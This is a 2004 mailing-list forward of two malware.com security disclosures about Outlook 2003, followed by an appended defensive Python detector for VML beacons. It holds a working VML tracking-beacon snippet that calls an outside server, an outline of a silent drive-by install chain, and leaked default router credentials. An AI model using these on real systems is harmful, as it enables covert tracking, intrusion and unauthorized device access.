
From "$witch" <a.spinella@communicationvalley.it>
Date Thu, 20 May 2004 10:49:04 +0200
Subject [hackmeeting] forward

Let me forward you this analysis of Outlook, in its entirety
(2 msgs).

I really like the way this guy comments.

----------------------------------------------------------------------------------------------------------------------

Tuesday, May 11, 2004

Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it.  Cursory examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'. So much so the default rendering of
html is in so-called 'restricted zone' which disallows nearly
everything [frames, iframes, objects, scripting etc.]. In
addition 'special' spam measures are taken to disallow graphic
downloads from a remote server in html email which can be used
to verify recipients:

[screen shot: http://www.malware.com/duhlook.png 40KB]

The Key Word is: nearly

Utilising Outlook's own bizarre scheMAH ! which comprises
a 'proper' frame along with an src pointing to our remote
server, we are able to ping the server and confirm our recipient
has viewed our email. We don't require graphics or frames or
iframes to do that:

<v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>


Notes:

1. We now commence our examination of the Microsoft Office 2003
suite, we're a bit late, but it has taken all this time to save
up to buy the thing
2. Quick 72 hour prodding reveals that this 'perceived' premier
device known as Outlook 2003 is in fact riddled with holes
3. Do not receive or open any emails period.  Use string and tin
cans if you must communicate



End Call


--
http://www.malware.com


---------------------------------------------------------------------------------------------------------------------


Monday, May 17, 2004

Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email' this can be achieved with the highly
touted 'secure-by-default'  Outlook 2003 mail client from the
craftsman known as 'Microsoft'.

Default settings of the 'gadget' are: restricted zone which
means no active x controls, no scripting, no file downloads etc.

This can all very easily be bypassed by simply embedding in a
rich text message our OLE object, one Windows Media Player. We
then point our source url to our media file which includes our
now run-of-the-mill 0s url flip and simply by previewing or
opening the email message invoke our device known as Internet
Explorer to proxy our manipulation of the recipient's machine.

In typical fashion despite the settings in the Windows Media
Player being set to 'disallow' scripting in media files, despite
Outlook 2003's 'highly' secure default setting of view html
content in the so-called 'restricted zone'; it all still works !

[screen shot: http://www.malware.com/rockitman.png 46KB]

This now all automates our process and coupling it with our
previous first step finding:

[http://www.securityfocus.com/bid/10307]

all we need to do next is our second step and embed the entire
package including the media file into the mail message and send
it along its merry way.

The whole Outlook 2003 'gadget' is broken.

Working Example:

Simply view the mail message:

http://www.malware.com/rockIT.zip

Notes:

1. Miserable selection of full screen = true can allow us to run
our 'video' in WMP full screen mode. How about that: forget
about html spam messages, now we have full screen video
advertisements on opening the mail message.
2. Tested on XP, 2K3 POP mail client settings Outlook 2003,
Exchange Server settings unknown at this time
3. Subject to initial WMP settings a notification of connection
settings can pop up, however generally dismissed at first
running of WMP along with neither yes or no selection having an
effect [as usual].
4. Firewalls should flag Outlook itself trying to escape out on
port 80. Nevertheless if all embedded no need for remote hosting.
5. Disable HTML settings or get another mail client [better of
the two as below]
6. Lots more where this came from


End Call

--
http://www.malware.com

---------------------------------------------------------------------------------------------------------


And now a small public "contribution":
the Pirelli routers issued to Telecom technicians for testing
ADSL lines have:

UID = admin
PWD = microbusinness

I don't know whether this also stays valid by default for customers.

regards

$witch

_______________________________________________
hackmeeting mailing list
hackmeeting@lists.papuasia.org
http://brr.papuasia.org/cgi-bin/mailman/listinfo/hackmeeting
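An added detection example, not part of the forwarded post or any malware.com code: a Python scanner for the VML-frame beacon the first post describes. It walks an HTML mail body, records which prefixes are bound to the VML namespace (through the XML:NAMESPACE tag or the v:* behavior style rule), and flags any VML element whose src/href points at a remote host, which is what a mail gateway or client-side filter would strip before rendering. The sample body and the tracker URL are constructed, and the scanner generalizes beyond the fixed v prefix the post uses.

```python
import re
from html.parser import HTMLParser

# Constructed sample mail body: the VML-frame beacon pattern from the post,
# with a placeholder tracker URL instead of a real one.
SAMPLE_MAIL_HTML = """<HTML><HEAD>
<STYLE> v:* { behavior: url(#default#VML); } </STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD><BODY>
<p>Hello</p>
<v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION: relative"
 src="http://tracker.example/beacon#recipient42"></v:vmlframe>
<v:rect style="WIDTH:10px"></v:rect>
</BODY></HTML>"""

VML_NS = "urn:schemas-microsoft-com:vml"
# Matches a style rule such as  v:* { behavior: url(#default#VML); }
BEHAVIOR_RE = re.compile(r"(\w+):\*\s*\{[^}]*behavior\s*:\s*url\(#default#vml\)", re.I)
# Absolute or protocol-relative URL: anything that would leave the message.
REMOTE_RE = re.compile(r"^\s*(https?:)?//", re.I)


class VmlBeaconScanner(HTMLParser):
    """Records VML elements whose src/href points at a remote host."""

    def __init__(self):
        super().__init__()
        self.prefixes = set()   # namespace prefixes bound to VML
        self.in_style = False
        self.findings = []      # (tag, url) pairs

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "style":
            self.in_style = True
        elif tag == "xml:namespace" and a.get("ns", "").lower() == VML_NS:
            self.prefixes.add(a.get("prefix", "").lower())
        prefix, sep, _ = tag.partition(":")
        if sep and prefix in self.prefixes:
            for key in ("src", "href"):
                if REMOTE_RE.match(a.get(key, "")):
                    self.findings.append((tag, a[key].strip()))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <XML:NAMESPACE .../> form

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style:   # pick up prefixes bound via the behavior rule
            for m in BEHAVIOR_RE.finditer(data):
                self.prefixes.add(m.group(1).lower())


def scan_vml_beacons(html):
    """Return [(tag, url), ...] for every remote-fetching VML element."""
    scanner = VmlBeaconScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

A body that yields any finding should be treated like an HTML mail with remote images: rendered without the element or quarantined, regardless of the zone the client says it renders in.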
